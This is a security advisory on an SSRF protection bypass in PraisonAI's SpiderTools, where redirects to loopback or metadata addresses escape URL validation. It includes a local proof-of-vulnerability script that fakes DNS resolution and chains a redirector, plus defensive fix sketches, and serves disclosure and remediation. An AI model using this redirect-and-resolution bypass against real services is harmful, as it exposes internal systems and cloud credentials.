Technology · global · ✓ verified · 90%

PraisonAI: SpiderTools redirect-target SSRF protection bypass

Name: PraisonAI: SpiderTools redirect-target SSRF protection bypass
Start: 2026-06-18T13:55:14Z
Location: Global (internet)

Category: cyber_advisory · pip

# SpiderTools redirect-target SSRF protection bypass

## Summary

`SpiderTools.scrape_page()` validates the initial URL and rejects direct loopback, private, link-local, metadata, and internal hostnames. It then calls `requests.Session.get()` without disabling automatic redirects or validating redirect `Location` targets. Requests follows redirects by default for GET requests.

A safe-looking public URL can therefore pass `_validate_url()`, redirect to a blocked target such as `127.0.0.1` or `169.254.169.254`, and have the redirected response body parsed and returned by `scrape_page()`.

The same sink is used by `extract_links()`, `crawl()`, and `extract_text()` through their calls to `scrape_page()`.

## Affected component

```text
src/praisonai-agents/praisonaiagents/tools/spider_tools.py
```

Tested affected:

- `v3.9.24` / `d08d98ca`
- `v3.9.26` / `62472a23`
- `v4.6.56` / `d3c4a2af`
- `v4.6.57` / `e90d92231853161ad931f3498da57651a9f8b528`
- current main `2f9677abb2ea68eab864ee8b6a828fd0141612e1`

No patched version is known at report time.

## Root cause

Current main validates only the caller-supplied URL:

```python
if not self._validate_url(url):
    return {"error": f"Invalid or potentially dangerous URL: {url}"}
```

The fetch then uses Requests defaults:

```python
response = session.get(
    url,
    timeout=timeout,
    verify=verify_ssl
)
```

Because `allow_redirects=False` is not set, Requests follows a 3xx redirect to a new destination that has not been checked by `_validate_url()` or `_host_is_blocked()`.

## Proof of vulnerability

The PoV below is local-only and does not contact external infrastructure. It starts a loopback-only internal service and a local redirector. During PraisonAI's initial host validation, `attacker.test` is made to look like a public address. During the actual HTTP request, it routes to the local redirector, which returns `302 Location: http://127.0.0.1:<port>/secret`.
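The destination classes named in the summary (loopback, private, link-local, metadata) are what a redirect `Location` target would need to be checked against before it is fetched. The following is a minimal standard-library sketch of such a check. The name `is_blocked_destination` is hypothetical and is not PraisonAI's `_validate_url()` or `_host_is_blocked()`; the exact policy (which schemes and address ranges to reject) is an assumption made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def _ip_is_internal(ip) -> bool:
    """Return True for addresses that should not be reachable via a scraper."""
    # Unwrap IPv4-mapped IPv6 addresses such as ::ffff:127.0.0.1.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (
        ip.is_loopback
        or ip.is_private
        or ip.is_link_local  # covers 169.254.169.254 (cloud metadata)
        or ip.is_reserved
        or ip.is_multicast
        or ip.is_unspecified
    )


def is_blocked_destination(url: str) -> bool:
    """Hypothetical check: True if `url` must not be fetched (assumed policy)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return True
    host = parts.hostname
    try:
        # Literal IP addresses are classified directly, without DNS.
        addresses = [ipaddress.ip_address(host)]
    except ValueError:
        try:
            infos = socket.getaddrinfo(host, None)
        except socket.gaierror:
            return True  # unresolvable hosts are rejected
        # Drop any IPv6 scope id ("%eth0") before parsing.
        addresses = [ipaddress.ip_address(i[4][0].split("%")[0]) for i in infos]
    # Reject if any resolved address is internal.
    return any(_ip_is_internal(ip) for ip in addresses)
```

A check like this only helps if it runs against every URL that is actually requested, including each redirect target. It also resolves the hostname separately from the HTTP client, so a name that resolves differently at connect time (as the PoV simulates for `attacker.test`) is not covered by this sketch.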
Full PoV:

```python
#!/usr/bin/env python3
"""Local PoV for SpiderTools redirect-target SSRF.

This uses only loopback services. The "attacker" hostname is treated as public
during PraisonAI's initial URL validation, then routed to a local redirector so
the PoV does not contact external infrastructure. The redirector points at a
loopback-only internal service. Vulnerable behavior is confirmed when
SpiderTools follows that redirect and returns the internal response body.
"""

from __future__ import annotations

import http.server
import importlib.util
import inspect
import os
import socket
import socketserver
import threading
from typing import Any


def _load_spider_tools_class():
    module_file = os.environ.get("PRAISONAI_SPIDER_TOOLS_FILE")
    if module_file:
        spec = importlib.util.spec_from_file_location("pov_spider_tools", module_file)
        if spec is None or spec.loader is None:
            raise RuntimeError(f"Could not load spider_tools file: {module_file}")
        module = importlib.util.module_from_spec(spec)
        spec.loader.exec_module(module)
        return module.SpiderTools

    from praisonaiagents.tools.spider_tools import SpiderTools

    return SpiderTools


class InternalHandler(http.server.BaseHTTPRequestHandler):
    body = b"SPIDER-INTERNAL-SECRET"

    def do_GET(self) -> None:  # noqa: N802
        self.server.hit = True  # type: ignore[attr-defined]
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(self.body)))
        self.end_headers()
        self.wfile.write(self.body)

    def log_message(self, *_args: Any) -> None:
        return


class RedirectHandler(http.server.BaseHTTPRequestHandler):
    target = ""

    def do_GET(self) -> None:  # noqa: N802
        self.server.hit = True  # type: ignore[attr-defined]
        self.send_response(302)
        self.send_header("Location", self.target)
        self.end_headers()

    def log_message(self, *_args: Any) -> None:
        return


def _called_from_spider_host_guard() -> bool:
    return any(frame.function == "_host_is_blocked" for frame in inspect.stack())


def main() -> int:
    os.environ.pop("ALLOW_LOCAL_CRAWL", None)

    internal = socketserver.TCPServer(("127.0.0.1", 0), InternalHandler)
    internal.hit = False  # type: ignore[attr-defined]
    internal_port = internal.server_address[1]

    RedirectHandler.target = f"http://127.0.0.1:{internal_port}/secret"
    redirect = socketserver.TCPServer(("127.0.0.1", 0), RedirectHandler)
    redirect.hit = False  # type: ignore[attr-defined]
    redirect_port = redirect.server_address[1]

    threading.Thread(target=internal.serve_forever, daemon=True).start()
    threading.Thread(target=redirect.serve_forever, daemon=True).start()

    original_getaddrinfo = socket.getaddrinfo

    def fake_getaddrinfo(host: str, port: int, *args: Any, **kwargs: Any):
        if host == "attacker.test":
            if _called_from_spider_host_guard():
                return [
                    (
                        socket.AF_INET,
                        socket.SOCK_STREAM,
                        6,
                        "",
                        ("93.184.216.34", port),
                    )
                ]
            return original_getaddrinfo("127.0.0.1", port, *args, **kwargs)
        return original_getaddrinfo(host, port, *args, **kwargs)

    tool = _load_spider_tools_class()()
    socket.getaddrinfo = fake_getaddrinfo
    try:
        direct_control = tool.scrape_page(
            f"http://127.0.0.1:{internal_port}/secret",
            timeout=5,
        )
        redirect_result = tool.scrape_page(
            f"http://attacker.test:{redirect_port}/go",
            timeout=5,
        )
        vulnerable_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]
        vulnerable_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]

        redirect.hit = False  # type: ignore[attr-defined]
        internal.hit = False  # type: ignore[attr-defined]

        import requests

        original_session_get = requests.Session.get

        def no_redirect_get(self, url, **kwargs):  # type: ignore[no-untyped-def]
            kwargs.setdefault("allow_redirects", False)
            return original_session_get(self, url, **kwargs)

        requests.Session.get = no_redirect_get
        try:
            no_redirect_control = _load_spider_tools_class()().scrape_page(
                f"http://attacker.test:{redirect_port}/go",
                timeout=5,
            )
        finally:
            requests.Session.get = original_session_get
        no_redirect_redirect_hit = bool(redirect.hit)  # type: ignore[attr-defined]
        no_redirect_internal_hit = bool(internal.hit)  # type: ignore[attr-defined]
    finally:
        socket.getaddrinfo = original_getaddrinfo
        redirect.shutdown()
        internal.shutdown()
        redirect.server_close()
        internal.server_close()

    print("DIRECT_CONTROL:", direct_control)
    print("REDIRECT_RESULT:", redirect_result)
    print("REDIRECT_SERVER_HIT:", vulnerable_redirect_hit)
    print("INTERNAL_SERVER_HIT:", vulnerable_internal_hit)
    print("NO_REDIRECT_CONTROL:", no_redirect_control)
    print("NO_REDIRECT_SERVER_HIT:", no_redirect_redirect_hit)
    print("NO_REDIRECT_INTERNAL_HIT:", no_redirect_internal_hit)

    if not isinstance(direct_control, dict) or "dangerous URL" not in str(direct_control):
        raise SystemExit("control failed: direct loopback was not blocked")
    if not isinstance(redirect_result, dict) or "error" in redirect_result:
        raise SystemExit(f"bypass failed: unexpected result {redirect_result!r}")
    if "SPIDER-INTERNAL-SECRET" not in str(redirect_result.get("content", "")):
        raise SystemExit("bypass failed: internal body was not returned")
    if not vulnerable_redirect_hit or not vulnerable_internal_hit:
        raise SystemExit("bypass failed: expected local servers were not hit")
    # The source text is truncated here; the next statement begins: if not no
```
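The PoV's `no_redirect_get` control suggests one direction for a fix: disable automatic redirects and follow them manually, validating each hop before it is requested. The sketch below illustrates that idea under stated assumptions and is not the project's patch. `fetch_with_validated_redirects`, `BlockedRedirect`, and the `fetch_once` and `is_allowed` callables are hypothetical names introduced here; the response object only needs `status_code` and `headers`, which a `requests.Response` provides.

```python
from typing import Callable, Mapping, Protocol
from urllib.parse import urljoin

# Status codes treated as redirects in this sketch.
REDIRECT_STATUSES = {301, 302, 303, 307, 308}


class ResponseLike(Protocol):
    """Minimal response shape assumed by the sketch."""

    status_code: int
    headers: Mapping[str, str]


class BlockedRedirect(Exception):
    """Raised when a hop fails validation or the redirect limit is hit."""


def fetch_with_validated_redirects(
    url: str,
    fetch_once: Callable[[str], ResponseLike],  # must NOT follow redirects itself
    is_allowed: Callable[[str], bool],          # e.g. a wrapper around URL validation
    max_redirects: int = 5,
) -> ResponseLike:
    """Follow redirects one hop at a time, validating every URL before fetching."""
    current = url
    for _ in range(max_redirects + 1):
        # Validate the initial URL and every redirect target alike.
        if not is_allowed(current):
            raise BlockedRedirect(f"blocked destination: {current}")
        response = fetch_once(current)
        location = response.headers.get("Location")
        if response.status_code not in REDIRECT_STATUSES or not location:
            return response  # final, non-redirect response
        # Resolve relative Location values against the current URL.
        current = urljoin(current, location)
    raise BlockedRedirect(f"too many redirects, last target: {current}")
```

With Requests, `fetch_once` could be something like `lambda u: session.get(u, timeout=timeout, verify=verify_ssl, allow_redirects=False)`, and `is_allowed` could wrap the existing URL validation. Because the blocked target is rejected before `fetch_once` is called for it, the internal service is never contacted.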

Sources

GitHub Advisory Database ↗ · first seen 2026-06-18 13:55 UTC
